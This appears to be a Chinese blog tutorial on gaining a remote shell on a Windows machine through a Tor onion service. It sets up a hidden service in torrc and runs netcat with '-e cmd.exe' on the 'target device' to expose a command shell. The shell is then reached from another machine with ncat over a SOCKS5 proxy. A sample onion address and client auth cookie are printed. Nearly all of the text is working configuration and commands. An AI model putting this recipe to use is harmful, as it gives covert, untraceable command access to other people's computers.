看我如何通过Tor Onion在Windows中执行远程Shell

操作方法

首先，我们要在一个Windows Tor客户端中创建一个Tor onion服务（即隐藏服务）。我下载了Tor Expert bundle（同样适用于Tor浏览器）-【下载地址】。

然后使用下列命令创建Tor配置文件torrc：

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

开启Tor服务之后，将会自动创建目录C:\demo\Tor\Service，并填充一系列必要的文件（<主机名>文件夹包含了这个Toronion服务的.onion地址）。

该onion服务将监听端口8662，而流量将会直接转发到127.0.0.1（端口12345）。

这里我们还可以给服务开启客户端验证功能，因为如果不开启这个功能的话，任何知道这个.onion地址和端口号的人都可以进行连接。最基础的客户端验证使用了共享密钥，你可以使用下列命令进行配置（torrc）：

HiddenServiceAuthorizeClient basic testuser

这里我选择使用testuser作为客户端名称：

接下来，我们可以使用配置文件torrc来开启Tor：

tor.exe -f torrc

.onion地址以及客户端验证cookie可以在service目录的<主机名>文件夹中找到：

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

当然了，你一定要保护认证cookie密钥的安全。

现在，用nc.exe在目标Windows设备上开启服务（我几年前就在电脑上下载了nc.exe，我不记得原始的URL地址了，我使用的版本是v1.11，MD5为ab41b1e2db77cebd9e2779110ee3915d）：

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor ExpertBundle以及nc.exe不需要任何其他的依赖组件（跟DLL类似），因此任意用户都可以直接运行。

现在我们的目标主机已经配置好了，在另一台设备上，我需要使用包含了认证cookie的配置文件来开启Tor服务：

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

接下来，我们需要运行ncat，因为ncat.exe支持socks5代理（nc.exe不支持）：

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

接下来，我们就得到远程Shell啦！

提醒大家一下，这种方法不适用于ncat v 7.60版本，具体原因请参考【这里】：

ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.